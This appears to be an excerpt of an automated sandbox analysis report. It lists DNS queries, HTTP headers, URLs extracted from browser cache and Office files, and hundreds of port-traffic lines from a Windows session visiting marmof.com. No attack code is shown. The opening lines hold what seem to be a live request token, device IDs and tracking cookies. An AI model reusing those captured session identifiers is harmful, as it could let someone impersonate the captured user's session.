t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAbW4Es2hMpK5%2BddDfrXHLRCOrS5qJBXtwmrW1l7DH9IXk92VZIQUjsdnGGTcmrgftbAv6lYViiBDcm4F/QmhXUSVKzR/iEVer%2BZY5ZcADrFAEV8w9jd2YRGacQ3JiIbuMnvcUaNkeYpe%2BIH1AdG2p%2Bmzxn1tO0bkrTeTjqxas9EwyiokS5uKCY1yszHAzulNyjfNX2KjRHTT0JGWXNldPgdl1pv/Qa3vYqQKp54VBDOW9qkyNnbo991eXwsZZKEsH3SlIrRVEDfxWOWBdcucbcT2cENqSMwc83zgIcoz0vPO3xO6vBfQeKvGcQueiiArjFYqE3lzxnWGmNtAThL0SL4QZgAAEFUl6hgu/QaViKb6gFpDkeqwAUcGgkA/SRRLec4QiMWli7Qd4KfGl23Rv4R3VMEiRL7NPjYdphvDBTDvhFYcEqYJgiss79IvYJY1GNWiMe8hnvEBVgalpHyA0NSGuqUxzkhF1y%2BG/uwpfjvYkocCpUp1%2BQbMddvazsSSbU5In53rCD0E8VI7XMN6RV4d%2BG4WlRJ2PWyRyI4Xyams4DKXQ3YcVpp8ZddLwVgEE8y131a4AfJG7saNlt3twgsGT//q4UR9KmXFuG51ZavertC/JVQo0ouQOHyYF4wvBFO%2BNUlQT1rYqkmoxkCvwBh/0Mi7mPE6y8SC2v02zQtN%2BQ3zQ7M%2BEWBy8LERaaYkC64MZvSIlb4cQNyDbSaWf3IAV7IYE%2BDHOMNJc7ZKloB8HpY0CoKlyr4ehXUQMKYl2LsVmJfS7K7uPZG1hzj1ZAcREpV2snKxiDoZd1T%2B0BMaewBtcSpd90QivcXrNcD/1EaFUloxokDwtHAeY3SygSqz332L3iBvlQNGD1u55XN2TV0xfx03YI7VJiy/RZdP3j4gZz0OtnMuCZnbdJqLQJz0UZElwSRDKXcVbcJnwGxiTlt2dY1y/9oB%26p%3DX-Agent-DeviceId: 01000A410900B03DX-BM-CBT: 1730908570User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: BFC66F85B991465C9E514F75CCD2F1B6X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=B4BB39E5F80E411D94C438C0FA7ACF94&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&LUT=1707317051026&IPMH=6b344233&IPMID=1707317270835&HV=1707317277; ANON=A=680C1B1A649CBD64DD40EBFCFFFFFFFF; MUID=BC76BB0020D345C1A049A4820CB4C03C; MUIDB=BC76BB0020D345C1A049A4820CB4C03C
            Source: chromecache_1007.14.drString found in binary or memory: <script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Organization","name":"Marmof","url":"https:\/\/marmof.com","logo":"https:\/\/app.marmof.com\/img\/logo.svg","sameAs":["https:\/\/www.facebook.com\/marmofcom","https:\/\/www.instagram.com\/marmof_com","https:\/\/www.linkedin.com\/company\/marmof","https:\/\/twitter.com\/marmofcom"]}</script> equals www.facebook.com (Facebook)
            Source: chromecache_1007.14.drString found in binary or memory: <script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Organization","name":"Marmof","url":"https:\/\/marmof.com","logo":"https:\/\/app.marmof.com\/img\/logo.svg","sameAs":["https:\/\/www.facebook.com\/marmofcom","https:\/\/www.instagram.com\/marmof_com","https:\/\/www.linkedin.com\/company\/marmof","https:\/\/twitter.com\/marmofcom"]}</script> equals www.linkedin.com (Linkedin)
            Source: chromecache_1007.14.drString found in binary or memory: <script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Organization","name":"Marmof","url":"https:\/\/marmof.com","logo":"https:\/\/app.marmof.com\/img\/logo.svg","sameAs":["https:\/\/www.facebook.com\/marmofcom","https:\/\/www.instagram.com\/marmof_com","https:\/\/www.linkedin.com\/company\/marmof","https:\/\/twitter.com\/marmofcom"]}</script> equals www.twitter.com (Twitter)
            Source: chromecache_1023.14.dr, chromecache_1033.14.drString found in binary or memory: return b}lD.F="internal.enableAutoEventOnTimer";var Yb=ka(["data-gtm-yt-inspected-"]),nD=["www.youtube.com","www.youtube-nocookie.com"],oD,pD=!1; equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: augloop.office.com
            Source: global trafficDNS traffic detected: DNS query: app.marmof.com
            Source: global trafficDNS traffic detected: DNS query: r.wdfl.co
            Source: global trafficDNS traffic detected: DNS query: ui-avatars.com
            Source: global trafficDNS traffic detected: DNS query: plausible.io
            Source: global trafficDNS traffic detected: DNS query: marmof.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: ns.califragilist.com
            Source: global trafficDNS traffic detected: DNS query: code.jquery.com
            Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: github.com
            Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
            Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
            Source: unknownHTTP traffic detected: POST /api/event HTTP/1.1Host: plausible.ioConnection: keep-aliveContent-Length: 96sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plainAccept: */*Origin: https://app.marmof.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.marmof.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:55:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1RxPFelQCu0PdU74vtLhs%2FDGY48xdLJUX2eveSxk9zIslKi6XvmNzk5ALlpPKZJlZvYV2Ls86JP3a0woJTzolxDT2PRV0FB5rCU6hgUqDYoeClPh3ZuW5lP9Kocsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3254&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2245&delivery_rate=878374&cwnd=243&unsent_bytes=0&cid=886ef739cb31a901&ts=194&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8de644d6f8b4e759-DENserver-timing: cfL4;desc="?proto=TCP&rtt=19080&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1902&delivery_rate=151781&cwnd=32&unsent_bytes=0&cid=9118dc92d1985769&ts=5067&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:55:39 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: MdDY5lPLGJ8NXof53kYBHUBLHtH3dRxhF34=$5ISA1a28wFb5R5K2cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8de644e37f69e752-DFWalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:55:43 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: sHkok9d8lfoxCk5lz9A92TUuNeJv+EQRSCA=$q45bJ9LhhvxFX5M1Server: cloudflareCF-RAY: 8de644fba85f2e72-DFWalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:55:47 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Z644eyuaiUoaJfZoVSiTluYcEb7EMRdoFRc=$LlyULDz+gQCr1JHfcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8de645157f66e792-DFWalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:55:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qFFVr271l2a9EeURYHzfk7ak8hcT9zYnYZhNYub4hdjg7WhZaYlcua9Gn3EYByJADDeKZyOF1QG7hXtj2NuoaWeb7%2BxzAoxtrvU2h8kjimcuZ4Y0od7xc0zWwHqqYg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3498&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2032&delivery_rate=788671&cwnd=251&unsent_bytes=0&cid=382db266d51f68bb&ts=129&x=0"Server: cloudflareCF-RAY: 8de645436ffb6c33-DFWserver-timing: cfL4;desc="?proto=TCP&rtt=1156&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1690&delivery_rate=2358306&cwnd=251&unsent_bytes=0&cid=526bd5aa033b531d&ts=1501&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:55:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cfn2S7Olj0%2B7Ydr7UFyw3BZJMT60l1MmzaauejYHc%2B2rZyslmGbERO9PZ5wcu7PbuH1QD8ZHx1240f5B4dKq67bR%2FKa9X3iGX%2BtH2KIAdNXkHigSseJYvHiZp1WJFg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3356&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2038&delivery_rate=879975&cwnd=251&unsent_bytes=0&cid=4c09ddd5e3fd42ba&ts=121&x=0"Server: cloudflareCF-RAY: 8de645519b1d2cb0-DFWserver-timing: cfL4;desc="?proto=TCP&rtt=1312&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1694&delivery_rate=2172543&cwnd=251&unsent_bytes=0&cid=8a26df0ced4c51b3&ts=519&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:55:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NvQXR867hHHaMXFPotOwNLC7jl8B01m8O5Gz%2F5Y9UPTd11sRU1G5dFfrT9le%2B2z26dt0RYEwePi7v9xLevKxo%2FlINBGdPfbG7xgS%2BTovxDCIgZghH0HkG%2B9h1R1W3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3452&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2102&delivery_rate=834101&cwnd=251&unsent_bytes=0&cid=f9c11eaaba2b0303&ts=149&x=0"Server: cloudflareCF-RAY: 8de6455f8c5f6bb3-DFWserver-timing: cfL4;desc="?proto=TCP&rtt=992&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1759&delivery_rate=2803484&cwnd=251&unsent_bytes=0&cid=62635c2cc0310897&ts=547&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 15:56:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIMmxHdUAdJDVYR%2FHhu%2F2x7Q%2BXf6CYX1JPIshrOr4ZqVSm5aVNFzWWyxA71FmbQx7Y%2BjsuC1S71OBszqp1cr8sV0Lim3gKZq2RgIDlanPKeSAOtYNULu6c8VsAwAmg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3344&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2034&delivery_rate=859092&cwnd=32&unsent_bytes=0&cid=78e4a5e3f1d097db&ts=127&x=0"Server: cloudflareCF-RAY: 8de6458e4b96e743-DENserver-timing: cfL4;desc="?proto=TCP&rtt=19126&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1693&delivery_rate=151401&cwnd=32&unsent_bytes=0&cid=d518705fee0f76f4&ts=562&x=0"
            Source: prep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drString found in binary or memory: http://augloop.office.com/settings.json
            Source: chromecache_1022.14.dr, chromecache_1024.14.drString found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
            Source: prep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drString found in binary or memory: http://json-schema.org/draft-07/schema#
            Source: chromecache_979.14.dr, chromecache_1030.14.drString found in binary or memory: http://underscorejs.org/LICENSE
            Source: chromecache_1007.14.drString found in binary or memory: https://app.marmof.com/build/assets/app-0b1f8530.css
            Source: chromecache_1007.14.drString found in binary or memory: https://app.marmof.com/build/assets/app-49265ad1.js
            Source: App1730908482691485400_D7CEFE08-05E6-4809-B291-F3E04FAC7956.log.0.drString found in binary or memory: https://augloop.office.com
            Source: chromecache_1023.14.dr, chromecache_1033.14.drString found in binary or memory: https://cct.google/taggy/agent.js
            Source: chromecache_1022.14.dr, chromecache_1024.14.drString found in binary or memory: https://github.com/fent)
            Source: chromecache_979.14.dr, chromecache_1030.14.drString found in binary or memory: https://lodash.com/
            Source: chromecache_979.14.dr, chromecache_1030.14.drString found in binary or memory: https://lodash.com/license
            Source: chromecache_1007.14.drString found in binary or memory: https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma0zl7w0q5n-wu.wo
            Source: chromecache_1007.14.drString found in binary or memory: https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1pl7w0q5n-wu.wo
            Source: chromecache_1007.14.drString found in binary or memory: https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1zl7w0q5nw.woff
            Source: chromecache_1007.14.drString found in binary or memory: https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma25l7w0q5n-wu.wo
            Source: chromecache_1007.14.drString found in binary or memory: https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2jl7w0q5n-wu.wo
            Source: chromecache_1007.14.drString found in binary or memory: https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2pl7w0q5n-wu.wo
            Source: chromecache_1007.14.drString found in binary or memory: https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2zl7w0q5n-wu.wo
            Source: chromecache_979.14.dr, chromecache_1030.14.drString found in binary or memory: https://npms.io/search?q=ponyfill.
            Source: chromecache_979.14.dr, chromecache_1030.14.drString found in binary or memory: https://openjsf.org/
            Source: chromecache_1023.14.dr, chromecache_1033.14.drString found in binary or memory: https://pagead2.googlesyndication.com
            Source: chromecache_1023.14.dr, chromecache_1033.14.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
            Source: chromecache_1007.14.drString found in binary or memory: https://r.wdfl.co/rw.js
            Source: chromecache_1023.14.dr, chromecache_1033.14.drString found in binary or memory: https://td.doubleclick.net
            Source: chromecache_1023.14.dr, chromecache_1033.14.drString found in binary or memory: https://www.google.com
            Source: chromecache_1023.14.dr, chromecache_1033.14.drString found in binary or memory: https://www.googleadservices.com
            Source: chromecache_1033.14.drString found in binary or memory: https://www.googletagmanager.com
            Source: chromecache_1007.14.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: chromecache_1007.14.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-MC7CMZBF
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
